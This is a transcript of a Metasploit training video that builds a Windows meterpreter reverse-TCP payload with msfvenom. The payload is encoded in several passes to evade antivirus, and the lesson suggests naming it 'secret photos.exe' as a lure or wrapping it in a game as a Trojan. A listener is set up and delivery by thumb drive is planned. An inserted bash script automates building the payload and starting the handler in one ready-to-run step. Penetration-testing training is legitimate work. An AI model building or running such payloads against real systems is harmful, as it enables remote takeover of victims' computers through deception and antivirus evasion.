Hello, Team Pompilio here for the Metasploit cyber class.
In this section we're going to be looking at a way to create a reverse connection on a Windows system. Ready? From the attacking system,
we're just going to be sending a simple executable file to the victim.
Obviously, you could bundle this file, this payload with the reverse connection, into some other kind of program, like a game;
you know, basically create a Trojan by wrapping a trusted program around this malicious payload.
For the purposes of our demonstration, we're just going to create the payload and show that it works.
All right, so first of all,
we need to be on our Kali system,
and what we're going to do is run
some of the Metasploit tools from the command line rather than going into the console.
This is a nice evolution to make for the Metasploit practitioner, because you're going to want to work more efficiently and perhaps script some of these things.
So you have to start thinking ahead
as to how you're capturing the work you're doing for possible reuse.
All right. So we're going to run the msfvenom command
to create a payload,
and we covered this in the Linux tutorials. Well, we're going to use it again.
Now, I've already saved my command in my command history.
That way I don't have to type it all in again.
But here it is.
We start off with the platform. I'm sorry, the payload: windows/meterpreter/reverse_tcp.
Notice I'm not specifying the platform or the architecture. In many cases,
the program will figure out what you want and make some assumptions. And if you don't like the assumption, then you have to adjust it.
I'm going to exclude known bad characters, so -b for bad bytes or bad characters. Specify the local host. Specify the port.
And another thing to start thinking about is the encoder that you use and how many iterations you want to go through to try to evade antivirus.
That's absolutely beyond the scope of what we're working on right here, but I just included five iterations
of the default encoder, which will probably be shikata_ga_nai.
Notice I'm specifying a file format: exe.
This is so the binary will run on a Windows 7 system, and plenty of other Windows systems as well.
And then I just give it the output.
What I want to call the
file... Maybe I shouldn't call it something so obvious. Let's call it
something a little bit more...
All right, secret photos dot exe.
So think about, you know, social engineering ideas.
All right, we see that
I didn't specify a platform or an architecture, but it figured it out from the payload.
shikata_ga_nai, as I mentioned, and we see that
our payload has been created.
It's good to be organized. Keep all your files in one place, if possible.
All right. So now I've got the payload created. So my next task is to create a listener.
And the nice thing about doing these reverse
connections, either through Linux or Windows, is
the fact that you should be able to evade certain firewalls. All you have to do is use a port that's allowed through the firewall, like 80 or 443.
I'm just using 4444 out of force of habit, because that's a port that's not commonly used. It's frequently a default port for a lot of Metasploit
exploits, I should say.
Okay. So now what I have to do is set up the handler.
And again, I've already typed this in, so I'm going to bring it up from my command history.
I'm putting it in quiet mode again, and the -x executes whatever I put between the double quotes as a series of commands.
So I tell it to use the multi/handler, which is the most versatile one
for these types of connections.
I set the same payload that I put into
the exploit that I'm going to send to the victim.
And then the usual things are here: my local host, my local port, again port 4444. Make sure this all matches
the payload that you created; otherwise the connection won't work.
And then there's the run command,
which is basically the same thing as saying exploit,
a shortcut for exploit. They do the same thing.
So let's go ahead and run this to create the listener.
It takes a few moments. Okay, there we go.
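Since the lesson makes the point that the payload and the handler must agree on payload name, LHOST and LPORT, and that this kind of work should be scripted for reuse, here is an added example (my own script, not part of the course or of Metasploit) that builds both from one set of variables and checks that they match before anything is run. The address 192.168.56.101, the output filename secret_photos.exe and the bad-character list are assumptions; the msfvenom flags (-p, -b, -i, -f, -o) and the msfconsole -q -x form are the same ones used in the lesson.

```shell
#!/usr/bin/env bash
# Added example, not from the course: one script that builds the msfvenom
# command and a matching msfconsole handler from a single set of variables,
# so the payload, LHOST and LPORT used by both can never drift apart.
# Assumed placeholders: the Kali address, output filename and bad chars.

PAYLOAD="windows/meterpreter/reverse_tcp"
LHOST="${LHOST:-192.168.56.101}"   # attacker (Kali) address, assumed
LPORT="${LPORT:-4444}"             # use 80 or 443 if a firewall must be passed
ITERATIONS=5                       # encoder passes, as in the lesson
BADCHARS='\x00'                    # bytes the payload must not contain
OUTFILE="${OUTFILE:-secret_photos.exe}"

# The msfvenom command line, printed rather than run so it can be reviewed
# or saved for reuse before it is executed.
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -b "%s" -i %s -f exe -o %s\n' \
    "$PAYLOAD" "$LHOST" "$LPORT" "$BADCHARS" "$ITERATIONS" "$OUTFILE"
}

# The handler, as the same command string the lesson passes to
# msfconsole -q -x "...". `run` and `exploit` are equivalent here.
handler_cmds() {
  printf 'use exploit/multi/handler; set PAYLOAD %s; set LHOST %s; set LPORT %s; run\n' \
    "$PAYLOAD" "$LHOST" "$LPORT"
}

# Guard against the mistake the lesson warns about: every setting the handler
# uses must also appear in the msfvenom command, or the callback never lands.
check_match() {
  venom=$(venom_cmd)
  handler=$(handler_cmds)
  for setting in "-p $PAYLOAD" "LHOST=$LHOST" "LPORT=$LPORT"; do
    case "$venom" in *"$setting"*) ;; *) echo "payload lacks $setting" >&2; return 1 ;; esac
  done
  for setting in "set PAYLOAD $PAYLOAD" "set LHOST $LHOST" "set LPORT $LPORT"; do
    case "$handler" in *"$setting"*) ;; *) echo "handler lacks $setting" >&2; return 1 ;; esac
  done
  return 0
}

# Only touch the real tools when explicitly asked ("build"), so the script
# can be read and checked on a machine without Metasploit installed.
if [ "${1:-}" = "build" ]; then
  check_match || exit 1
  eval "$(venom_cmd)"                # generate the payload file
  msfconsole -q -x "$(handler_cmds)" # then start the listener
fi
```

Run it as `./reverse_payload.sh build` on Kali; with no argument it only defines the functions, so `check_match` can be used from another script. Changing LPORT to 443 in one place updates both the payload and the handler, which is the whole point.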
Let's see. So I am actually running...
I'm going to use a thumb drive to get the file to the victim.
So let's see, I want to go to the directory,
win reverse shell, and there's my secret photos.
This is a convenient way to move things between VMs if you don't want to enable other security features like copy and paste.
It's just a little bit of extra work to do the connect and disconnect.
All right. Let's now look at it on our Windows system.